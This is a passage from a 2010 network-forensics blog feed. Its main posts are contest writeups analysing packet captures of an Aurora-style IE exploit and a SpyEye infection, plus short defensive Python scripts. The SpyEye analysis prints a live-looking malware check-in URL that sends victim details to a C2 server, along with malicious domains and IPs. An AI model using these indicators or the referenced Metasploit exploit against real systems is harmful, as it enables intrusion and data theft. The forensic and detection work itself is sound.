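    syns = defaultdict(list)        # (src, dst, dport): [(t, sport), ...]
    answered = set()                # (client, server, server_port) with a SYN-ACK
    for t, src, sport, dst, dport, flags in pkts:
        if flags == "S":
            syns[(src, dst, dport)].append((t, sport))
        elif flags == "SA":
            answered.add((dst, src, sport))   # reply flows server to client
    alerts = []
    for (src, dst, dport), tries in syns.items():
        if (src, dst, dport) in answered:
            continue
        tries.sort()
        span = tries[-1][0] - tries[0][0]
        if len(tries) >= min_attempts and window_s >= span:
            gaps = [b[0] - a[0] for a, b in zip(tries, tries[1:])]
            alerts.append({
                "src": src, "dst": dst, "dport": dport,
                "attempts": len(tries),
                "distinct_sports": len({sp for _, sp in tries}),
                "span_s": span,
                "mean_gap_s": sum(gaps) / len(gaps) if gaps else 0.0,
            })
    return alerts

if __name__ == "__main__":
    for a in unanswered_syn_bursts(make_sample_packets()):
        print("%(src)s to %(dst)s:%(dport)d: %(attempts)d unanswered SYNs over "
              "%(span_s).0fs, %(distinct_sports)d source ports, "
              "mean gap %(mean_gap_s).1fs" % a)
```

The answered web connection is filtered out because its SYN-ACK was seen, while the port 4445 attempts produce a single alert; a steady mean gap and a small set of rotating source ports are the traits a signature would look for.&lt;br /&gt;&lt;br /&gt;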
Typically you'd want to be listening ahead of time on that port, or perhaps have a more random and longer pause time between packets.&lt;br /&gt;&lt;br /&gt;Note:  In all fairness I wouldn't have even looked at this from the Metasploit side if Erik hadn't mentioned it in our ongoing conversations; he at least got me started down the Meterpreter road here.  This brings up why I like to work on issues like this in a team setting: it gives you someone else to bounce ideas/issues off of!&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;So yes, Metasploit and the ms10_002_aurora exploit make pretty easy work of compromising an XP box with IE6 still installed on it.  This appears to be what happened overall in this case, but there may be other exploits that utilize some of these same things.</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/7165161481422096742/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=7165161481422096742' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7165161481422096742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/7165161481422096742'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/06/forensic-contest-6-answer.html' title='Forensic contest #6 Answer'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4089826119985330680</id><published>2010-06-21T16:36:00.002-06:00</published><updated>2010-06-21T16:53:11.502-06:00</updated><title type='text'>Full Disclosure vs Responsible Disclosure</title><content type='html'>There was an ongoing thread war last week (or the week before) on Full Disclosure vs Responsible Disclosure when someone notified MS of a bug and then 4 days later released the info to the public.  After being on vacation for the past week or so I now see there is a known exploit in the wild on this.&lt;br /&gt;&lt;br /&gt;Over the years I've gone back and forth on the whole FD vs RD argument.  Now that I support a few hundred systems I'm normally more on the RD side of things, but when is it the vendor's responsibility to at least be forthcoming with information on the issue to the people who report it?  &lt;br /&gt;&lt;br /&gt;In the above case, I'm not sure 4 days is reasonable to expect MS to fix the issue, and I have no idea what, if anything, they responded to the person who informed them of it.  But I got thinking of this again today when I logged into Twitter.&lt;br /&gt;&lt;br /&gt;Back at the beginning of May it was reported that if you changed any of your settings in Twitter your password would be sent in clear text.  The original author of the post claimed they notified Twitter of it.  I know I also did; I figured if more than one person mentioned it, it might get past the first line of Helpdesk personnel.   Fast forward ~45 days, no response from Twitter and the bug still exists.  &lt;br /&gt;&lt;br /&gt;I decided I'd poke around a bit more on their site, see if I could figure out a better way to contact them.  After 10 mins of going in circles, I was back at the same form I'd tried before.  
They have a place that says "Check Existing Requests" and "View recently solved and closed tickets", but for the life of me, no way to open a new ticket!&lt;br /&gt;&lt;br /&gt;Now I at least understand better what happens when we get upset clients, complaining about going round and round in circles and getting nowhere.  We all put things in place to try to limit the number of actual calls that come in, hopefully allowing the user to find the answer themselves, but when it so frustrates the person reporting issues, I can see why some resort to FD from the get go.  &lt;br /&gt;&lt;br /&gt;I still like the idea of RD, but sometimes I have to admit, some things get fixed a lot quicker when an exploit is floating around out there.  While this is great for getting things fixed, it still really sucks being the guy on the other end trying to rush a patch out!  It also really sucks being the support guy that has to install that patch on hundreds of systems!</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4089826119985330680/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4089826119985330680' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4089826119985330680'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4089826119985330680'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/06/full-disclosure-vs-responsible.html' title='Full Disclosure vs Responsible 
Disclosure'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4941023217506579337</id><published>2010-06-04T09:09:00.002-06:00</published><updated>2010-06-04T09:20:08.653-06:00</updated><title type='text'>Forensics contest #5 results</title><content type='html'>Well NetworkMiner is getting a huge amount of use in these forensic contests these days.  By my count 6 of the 10 finalists used it this time around (still reading through all 10 of them, just did a quick term search, so some may have just mentioned it and not actually used it).&lt;br /&gt;&lt;br /&gt;Reading through the winner's entry, which as the contest owners noted was very well done, it provided a very nice walk through and is well worth the read.&lt;br /&gt;&lt;br /&gt;He did his analysis on a Windows box also (like I did), but the more I think about it, the more I think we should be looking at doing this on Linux.  A lot of it is a comfort level, what tools you have available etc, but if you know you are working with something that is going to be attacking Windows, doesn't it make sense to do your analysis on a system you know it can't infect?  
I went to great lengths to run mine in a sandbox, on a VM I was willing to scrub, and with no outside network, but the more I think about this the more I think doing analysis on the OS that the infection is going to go after is a bad idea.&lt;br /&gt;&lt;br /&gt;With that said, I'm still working on contest #6 on a Windows system currently because I'm writing a program that will specifically carve exes out of a tcp data stream, but hey, I'm more comfortable on Windows, give me a break!&lt;br /&gt;&lt;br /&gt;On the other hand, you don't always know what payload you are going to find, and drive-by malware is everywhere, so is any system actually safe these days?</content><link rel='related' href='http://forensicscontest.com/2010/06/03/puzzle-5-winners' title='Forensics contest #5 results'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4941023217506579337/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4941023217506579337' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4941023217506579337'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4941023217506579337'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/06/forensics-contest-5-results.html' title='Forensics contest #5 results'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-1748114216537349507</id><published>2010-05-22T12:43:00.002-06:00</published><updated>2010-05-22T12:56:19.295-06:00</updated><title type='text'>Forensics Contest #6 Ann's Aurora</title><content type='html'>Hi! Recently we were challenged by SANS Fellow Rob Lee (author of “Computer Forensics” 508) to create a puzzle based on an Advanced Persistent Threat (APT). We thought this was a great idea! So this month we are doing a special release through the SANS Institute based on APT. SANS is sponsoring some especially cool prizes– check out the full puzzle and writeup here:&lt;br /&gt;&lt;br /&gt;http://computer-forensics.sans.org/challenges/&lt;br /&gt;&lt;br /&gt;The contest is a client-side attack based on Operation Aurora. This packet capture contains a full recording of a real Windows system getting exploited via the same mechanism that was used to exploit Google. Ann spear-phishes a developer, who clicks on a link and connects to her malicious web server. Then she configures the victim to make outbound persistent connection attempts to her server so that she can retain access and reconnect in the future.&lt;br /&gt;&lt;br /&gt;--- &lt;br /&gt;&lt;br /&gt;A bit different from the first 4, it uses ideas you may have come up with in #5, but has some new twists to be sure!  One other twist is you have to have a SANS portal account to grab the evidence file.  
Not sure what is required to get an account, I already have one since I hold a few certs from there already.&lt;br /&gt;&lt;br /&gt;On top of that they are pushing the upcoming Forensics Summit in DC, more info can be found here:&lt;br /&gt;http://www.sans.org/forensics-incident-response-summit-2010/agenda.php&lt;br /&gt;&lt;br /&gt;Looking over the agenda here is some interesting info:&lt;br /&gt;&lt;br /&gt;On Thursday July 8th (end of the first day)&lt;br /&gt;6:30pm - 7:30pm&lt;br /&gt;    SANS Forensic Challenge Winners Presentation&lt;br /&gt;    Winners of the 2010 Forensic Challenge "Ann's Aurora" to be announced and presented with their awards via this live and internet broadcasted event!&lt;br /&gt;    Prizes: 2 netbook and free passes to the 2011 Forensics/IR Summit&lt;br /&gt;&lt;br /&gt;Or directly from the writeup:&lt;br /&gt;Prizes&lt;br /&gt;&lt;br /&gt;2 Lenovo Ideapad SNIFT Configured Netbooks for first and second place teams.&lt;br /&gt;&lt;br /&gt;In addition, each team that places in the top three will be awarded free passes to the 2011 Incident Response and Forensic Summit (One pass per entry)&lt;br /&gt;&lt;br /&gt;You have a little over a month, good luck!  
(deadline 6/27/2010)</content><link rel='related' href='http://computer-forensics.sans.org/challenges/' title='Forensics Contest #6 Ann&apos;s Aurora'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/1748114216537349507/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=1748114216537349507' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1748114216537349507'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/1748114216537349507'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/05/forensics-contest-6-anns-aurora.html' title='Forensics Contest #6 Ann&apos;s Aurora'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6202867615112683449</id><published>2010-05-19T09:18:00.002-06:00</published><updated>2010-05-19T09:25:59.088-06:00</updated><title type='text'>Detecting x86 buffer overflow shellcode attacks at the network level</title><content type='html'>Interesting article.  A bit outside of my comfort level/understanding on things since I don't play much with memory, but interesting nonetheless.  
Not sure how accurate the article is, but for your reading enjoyment.&lt;br /&gt;&lt;br /&gt;Maybe it will all make more sense once I go back through Chapter 2 in "The Rootkit Arsenal" book that I'm currently reading.  Chapter 2 was all about jumping around in memory and it seems to be a very well written book so far, but more on that some other time.</content><link rel='related' href='http://www.networkforensics.com/2010/05/16/network-detection-of-x86-buffer-overflow-shellcode/' title='Detecting x86 buffer overflow shellcode attacks at the network level'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6202867615112683449/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6202867615112683449' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6202867615112683449'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6202867615112683449'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/05/detecting-x86-buffer-overflow-shellcode.html' title='Detecting x86 buffer overflow shellcode attacks at the network level'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 
src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-6367981791805200587</id><published>2010-05-18T15:58:00.002-06:00</published><updated>2010-05-18T16:07:17.041-06:00</updated><title type='text'>What does your browser tell about you</title><content type='html'>This has been talked about in a few places the past 2 days, but it is a good topic for excess info and what it tells about you.  I'm pretty sure someone did something on this before, but maybe not.&lt;br /&gt;&lt;br /&gt;Anyway, some good research to look at about how unique your browser really is and how it can be used to track back to you.  This is due to plugins, cookies and other things.  &lt;br /&gt;&lt;br /&gt;Good ways to block it are:&lt;br /&gt;TorButton, NoScript or other JavaScript blocking tools, or a bunch of corporate cloned machines!  I'm sure there were other things; that is what I recall from my quick read the other day.&lt;br /&gt;&lt;br /&gt;The main paper can be found &lt;a href="https://panopticlick.eff.org/browser-uniqueness.pdf"&gt;here&lt;/a&gt;.</content><link rel='related' href='http://www.eff.org/press/archives/2010/05/13' title='What does your browser tell about you'/><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/6367981791805200587/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=6367981791805200587' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6367981791805200587'/><link rel='self' type='application/atom+xml' 
href='http://www.blogger.com/feeds/5343200444918965958/posts/default/6367981791805200587'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/05/what-does-your-browser-tell-about-you.html' title='What does your browser tell about you'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-8439561341317993154</id><published>2010-05-14T16:05:00.003-06:00</published><updated>2010-05-14T16:11:12.041-06:00</updated><title type='text'>Forensics contest #5 Answer</title><content type='html'>Well 5/13/10 has come and gone now, so here are my answers for the latest contest.  As noted later in my writeup, no new tools this time, just my writeup and approach to it.  &lt;br /&gt;&lt;br /&gt;Answer 1a: sdfg.jar&lt;br /&gt;Answer 1b: q.jar&lt;br /&gt;Answer 2: ADMINISTRATOR&lt;br /&gt;Answer 3: http://nrtjo.eu/true.php&lt;br /&gt;Answer 4: 5942BA36CF732097479C51986EEE91ED&lt;br /&gt;Answer 5: UPX&lt;br /&gt;Answer 6: 0F37839F48F7FC77E6D50E14657FB96E&lt;br /&gt;Answer 7: 213.155.29.144&lt;br /&gt;&lt;br /&gt;Description:&lt;br /&gt;Up Front:&lt;br /&gt;This is a writeup on how I did it, in a manual process, with no new tools, just an attempt to do the analysis in a controlled environment and not infect anything that I didn't want to.&lt;br /&gt;&lt;br /&gt;Before doing any malware analysis there are a few things to know/understand.&lt;br /&gt;1.  Odds are whatever machine you are doing this on is going to get infected sooner or later.&lt;br /&gt;2.  
While running in a VM env is a good way to test/work on these, there is the possibility for the programs to determine they are in a VM and act differently because of it.&lt;br /&gt;&lt;br /&gt;System Setup:&lt;br /&gt;- XP VM&lt;br /&gt;- Sandbox software - www.sandboxie.com&lt;br /&gt;- Hashtab - beeblebrox.org&lt;br /&gt;- NetworkMiner - networkminer.sourceforge.net&lt;br /&gt;- wireshark&lt;br /&gt;- exeinfope&lt;br /&gt;- PEiD&lt;br /&gt;- UPX - http://upx.sourceforge.net/&lt;br /&gt;- NO AV software installed&lt;br /&gt;&lt;br /&gt;Download and install all software, disconnect network, just in case.&lt;br /&gt;&lt;br /&gt;Once Sandboxie is installed some quick initial tweaks for today's fun:&lt;br /&gt;- Sandbox Settings &gt; Recovery &gt; Immediate Recovery &gt; Uncheck 'Enable Immediate Recovery'&lt;br /&gt;May want to look at (I haven't played with these settings before):&lt;br /&gt;Restrictions &gt; Drop Rights &gt; 'Drop rights from Administrators and Power Users group'&lt;br /&gt;&lt;br /&gt;After installing all of the software above in my VM I snapshotted it so that I could roll back to a known safe/uninfected machine as needed.&lt;br /&gt;&lt;br /&gt;On to looking at the infected.pcap file:&lt;br /&gt;First thing to do is launch NetworkMiner from within a Sandbox.  Right click on the NetworkMiner.exe and say 'Run Sandboxed' (again we've already installed all software)&lt;br /&gt;&lt;br /&gt;Let's first look at the different conversations/systems involved.  We have 2 systems on the local network.&lt;br /&gt;192.168.23.2 - appears to be the default gateway or proxy server for the network&lt;br /&gt;192.168.23.129 - Windows XP system with .Net 2.0, 3.0, 3.5 and Java 1.6.0.0_05 installed on it.  
And on a workgroup/domain called TICKLAB (need to check Satori and see why I didn't see this there?)&lt;br /&gt;&lt;br /&gt;192.168.23.129 has 4 outgoing sessions:&lt;br /&gt;59.53.91.102:80 [nrtjo.eu] - 6 sessions, downloading 7 files&lt;br /&gt;65.55.195.250:443 - 1 session&lt;br /&gt;212.252.32.20:80 [freeways.in] - 1 session, downloading 1 file&lt;br /&gt;213.155.29.144:444 - 1 session&lt;br /&gt;&lt;br /&gt;We can now safely look at the files that were extracted by NetworkMiner. Files Tab &gt; Right click on first file &gt; Open Folder.  When you do this action from within a Sandboxie env it will open up the file explorer also in that same sandboxed env.  You can see this with the [#] Title [#] scenario in the title bar.  While you can still infect yourself by running an infected exe this way, it will be, in theory at least, contained by the sandbox and go away when you close out and delete the sandbox.&lt;br /&gt;&lt;br /&gt;The 7 files that were downloaded from 59.53.91.102 were: (filename as NetworkMiner saved it, may not be the name it was on the server)&lt;br /&gt;true.php.html&lt;br /&gt;xxx.xxx.txt&lt;br /&gt;favicon.ico.html&lt;br /&gt;sdfg.jar.x-java-archive&lt;br /&gt;q.jar.x-java-archive&lt;br /&gt;file.exe.octet-stream&lt;br /&gt;file.exe[1].octet-stream&lt;br /&gt;&lt;br /&gt;For proper analysis of what it is actually doing true.php should be run through a process to convert it to 100% readable text.  It does a few different things trying to obscure what it is doing, I assume so as to try to evade different tests that a system may do to determine if it is malicious.  Two things you can see are the two jar files it pulls in with document.write, sdfg.jar and q.jar.  
xxx.xxx will also need to be looked at because it calls .replace on the text in true.php (I think, need to dig more)&lt;br /&gt;&lt;br /&gt;Anyway, we have an answer to #1 and #3 now, the two .jar files that got created and what file did it.&lt;br /&gt;&lt;br /&gt;Conversation to 212.252.32.20 reveals a bit of interesting info.  It requests the following:&lt;br /&gt;/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&amp;ver=10084&amp;stat=ONLINE&amp;ie=8.0.6001.18702&amp;os=5.1.2600&amp;ut=Admin&amp;cpu=92&amp;ccrc=5A4F4DF7&amp;md5=5942ba36cf732097479c51986eee91ed&lt;br /&gt;&lt;br /&gt;Broken down we have:&lt;br /&gt;guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&lt;br /&gt;Logged on user id, computer name, ? hash maybe ?&lt;br /&gt;&lt;br /&gt;So now we have answer #2.&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;ie=8.0.6001.18702&lt;br /&gt;version of IE on the infected system&lt;br /&gt;&lt;br /&gt;os=5.1.2600&lt;br /&gt;System OS which we already determined by passive means before, but good to see we have the same info here.&lt;br /&gt;&lt;br /&gt;...&lt;br /&gt;&lt;br /&gt;md5=5942ba36cf732097479c51986eee91ed&lt;br /&gt;This is the MD5 of the packed file. 
Possibly a phone home feature to let it know what version is out there on each system, if ver above isn't that?&lt;br /&gt;&lt;br /&gt;We can verify this is the MD5 on the file by right clicking on the file.exe.octet-stream and going to properties and then the File Hashes tab (this is what HashTab does)&lt;br /&gt;&lt;br /&gt;Now we have answer #4.&lt;br /&gt;&lt;br /&gt;Based on the MD5 and some of the other info it is doing, these appear to be decent writeups on it:&lt;br /&gt;http://www.threatexpert.com/report.aspx?md5=0f37839f48f7fc77e6d50e14657fb96e&lt;br /&gt;http://autovin.pandasecurity.my/?p=4780&lt;br /&gt;http://www.virustotal.com/analisis/9459b0d6f7cdec6860c458944386896f78cb60befdd04fbeab0df5b6661a3f81-1268644492&lt;br /&gt;http://anubis.iseclab.org/?action=result&amp;task_id=1c8c1f787d845a7941d93e37adce1be8b&amp;format=txt&lt;br /&gt;&lt;br /&gt;Ok, so now we need to determine how/if our .exe is packed.&lt;br /&gt;Right click on exeinfope.exe and tell it to run sandboxed (needed, probably not, but...).  Go to the directory where the file.exe.octet-stream file resides and open it.&lt;br /&gt;&lt;br /&gt;Exeinfo PE ver 0.0.2.7 says it is:&lt;br /&gt;UPX -&gt; Markus &amp; Laszlo ver. [ 3.04 ] &lt;- info from file. ( sign like UPX packer )&lt;br /&gt;&lt;br /&gt;Same idea, but with PEiD v0.95 (may be a newer version?)&lt;br /&gt;UPX 0.89.6 - 1.02 / 1.05 - 2.90 -&gt; Markus &amp; Laszlo&lt;br /&gt;&lt;br /&gt;So we now have answer #5&lt;br /&gt;&lt;br /&gt;To get answer #6 we'll need to get UPX and run "upx -d" on the file and then compute the MD5 with HashTab again.&lt;br /&gt;&lt;br /&gt;So just to be safe, run a cmd.exe inside the sandbox also, go to the directory where the file is:&lt;br /&gt;upx -d file.exe.octet-stream&lt;br /&gt;&lt;br /&gt;This will expand the file out.  
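&lt;br /&gt;&lt;br /&gt;As an added example (my own Python, not part of the original writeup and not how Exeinfo PE or PEiD work internally), here is the check a script can do instead of eyeballing a packer identifier: walk the PE section table and look for the UPX0/UPX1 section names UPX leaves behind, where UPX0 normally has no raw data at all because it is only the destination the packed code is unpacked into. The sample PE is built from scratch inside the script (it is not a real executable, just enough header to parse) so it runs offline, and md5_hex is the same hash step HashTab performs in the writeup.

```python
import hashlib

def md5_hex(data):
    """Upper-case MD5 hex digest, the same value HashTab shows."""
    return hashlib.md5(data).hexdigest().upper()

def build_fake_pe(sections):
    """Construct a minimal PE32 file with the given section table.
    sections: list of (name, virtual_size, raw_size). Headers only, not runnable."""
    coff_off = 0x80
    opt_size = 0xE0                                   # PE32 optional header size
    dos = bytearray(coff_off)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = coff_off.to_bytes(4, "little")  # e_lfanew
    pe = bytearray(b"PE\x00\x00")
    pe += (0x14C).to_bytes(2, "little")               # Machine: i386
    pe += len(sections).to_bytes(2, "little")         # NumberOfSections
    pe += bytes(12)                                   # timestamp, symtab ptr, nsyms
    pe += opt_size.to_bytes(2, "little")              # SizeOfOptionalHeader
    pe += (0x102).to_bytes(2, "little")               # Characteristics: EXE, 32-bit
    pe += (0x10B).to_bytes(2, "little") + bytes(opt_size - 2)  # PE32 magic + zeros
    raw_ptr = 0x400
    for name, vsize, rsize in sections:
        sec = bytearray(40)
        sec[0:8] = name.encode("ascii").ljust(8, b"\x00")
        sec[8:12] = vsize.to_bytes(4, "little")       # VirtualSize
        sec[12:16] = (0x1000).to_bytes(4, "little")   # VirtualAddress (dummy)
        sec[16:20] = rsize.to_bytes(4, "little")      # SizeOfRawData
        sec[20:24] = raw_ptr.to_bytes(4, "little")    # PointerToRawData
        raw_ptr += rsize
        pe += sec
    return bytes(dos) + bytes(pe)

def pe_sections(data):
    """Parse the section table: returns [(name, virtual_size, raw_size), ...]."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    nsec = int.from_bytes(data[coff + 2:coff + 4], "little")
    opt_size = int.from_bytes(data[coff + 16:coff + 18], "little")
    table = coff + 20 + opt_size                      # section table follows the optional header
    out = []
    for i in range(nsec):
        s = data[table + 40 * i:table + 40 * (i + 1)]
        if len(s) != 40:
            raise ValueError("truncated section table")
        name = s[0:8].rstrip(b"\x00").decode("latin-1")
        out.append((name, int.from_bytes(s[8:12], "little"),
                    int.from_bytes(s[16:20], "little")))
    return out

def upx_indicators(data):
    """Section-table evidence of UPX: UPX-named sections, and a first section
    with zero raw size but a non-zero virtual size (the unpack destination).
    The second test is a heuristic; other packers produce the same shape."""
    secs = pe_sections(data)
    names = [n for n, _, _ in secs]
    upx_named = any(n.upper().startswith("UPX") for n in names)
    empty_first = len(secs) > 0 and secs[0][2] == 0 and secs[0][1] > 0
    return {"sections": names, "upx_named": upx_named,
            "empty_first_section": empty_first,
            "likely_upx": upx_named or empty_first}

if __name__ == "__main__":
    packed = build_fake_pe([("UPX0", 0x1C000, 0), ("UPX1", 0x6000, 0x5A00), (".rsrc", 0x1000, 0xA00)])
    plain = build_fake_pe([(".text", 0x2000, 0x2000), (".data", 0x800, 0x600)])
    for label, blob in (("packed", packed), ("plain", plain)):
        print(label, md5_hex(blob), upx_indicators(blob))
```

Signature scanners such as PEiD match byte patterns at the entry point on top of this; the section-name test is the quick first pass, and the hash taken before and after "upx -d" is what changes between answers #4 and #6.&lt;br /&gt;&lt;br /&gt;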
Now go back to explorer, properties on file.exe.octet-stream, File Hashes and then the new&lt;br /&gt;&lt;br /&gt;MD5 is:  0F37839F48F7FC77E6D50E14657FB96E&lt;br /&gt;&lt;br /&gt;Answer #6&lt;br /&gt;&lt;br /&gt;For the last part, to know where it tries to go there are a few ways to look at this.  We know it has to be one of the systems that our infected host tried to contact, so we can look at the traffic there and try to determine it, we can dig around in the unpacked .exe and try to find the code (beyond my level) or we can purposely infect our VM and see what happens.&lt;br /&gt;&lt;br /&gt;Based on other info we found on the MD5 we actually know from other people's writeups where it was going and can verify that we also tried to go there in the packet capture.  213.155.29.144 port 444.&lt;br /&gt;&lt;br /&gt;This malware appears to be SpyEye, a good writeup on it can be found here, which details some of what I had already figured out from the URL info:&lt;br /&gt;http://blog.novirusthanks.org/2010/01/a-new-sophisticated-bot-named-spyeye-is-on-the-market/</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/8439561341317993154/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=8439561341317993154' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8439561341317993154'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/8439561341317993154'/><link rel='alternate' type='text/html' 
href='http://chatteronthewire.blogspot.com/2010/05/forensics-contest-5-answer.html' title='Forensics contest #5 Answer'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-4835649585974186547</id><published>2010-05-12T08:05:00.002-06:00</published><updated>2010-05-12T08:15:04.370-06:00</updated><title type='text'>Twitter and clear text passwords when changing settings</title><content type='html'>There are a few links around and I actually Tweeted about this last week, but figured I'd put it here since it is a bit more permanent.&lt;br /&gt;&lt;br /&gt;If you change any settings in Twitter it pushes that password in clear text.  Initial login is secure, but changes to settings afterward reprompt for the password, and this one is sent in the clear.  Something to be aware of! (Also sounds like password changes once logged on may be sent in the clear also, I didn't verify this one) &lt;br /&gt;&lt;br /&gt;I found out about it from the NetworkMiner list and verified the issue myself.  
I sent something on to Twitter through their help page, but haven't heard anything on it nor do I know if they've updated it, but here was the original thread and another video demo:&lt;br /&gt;&lt;br /&gt;http://www.hak5.org/forums/index.php?s=2e2403f573f4726eb99f84edad76c867&amp;showtopic=16497&lt;br /&gt;http://www.youtube.com/watch?v=177qSf1VcWg&amp;feature=player_embedded#!</content><link rel='replies' type='application/atom+xml' href='http://chatteronthewire.blogspot.com/feeds/4835649585974186547/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5343200444918965958&amp;postID=4835649585974186547' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4835649585974186547'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5343200444918965958/posts/default/4835649585974186547'/><link rel='alternate' type='text/html' href='http://chatteronthewire.blogspot.com/2010/05/twitter-and-clear-text-passwords-when.html' title='Twitter and clear text passwords when changing settings'/><author><name>xnih</name><uri>http://www.blogger.com/profile/13163054542096571716</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5343200444918965958.post-1963533445155880015</id><published>2010-05-10T13:03:00.002-06:00</published><updated>2010-05-10T13:06:01.279-06:00</updated><title type='text'>Fingerprint Editor updated</title><content type='html'>There have been a few updates to this and other 
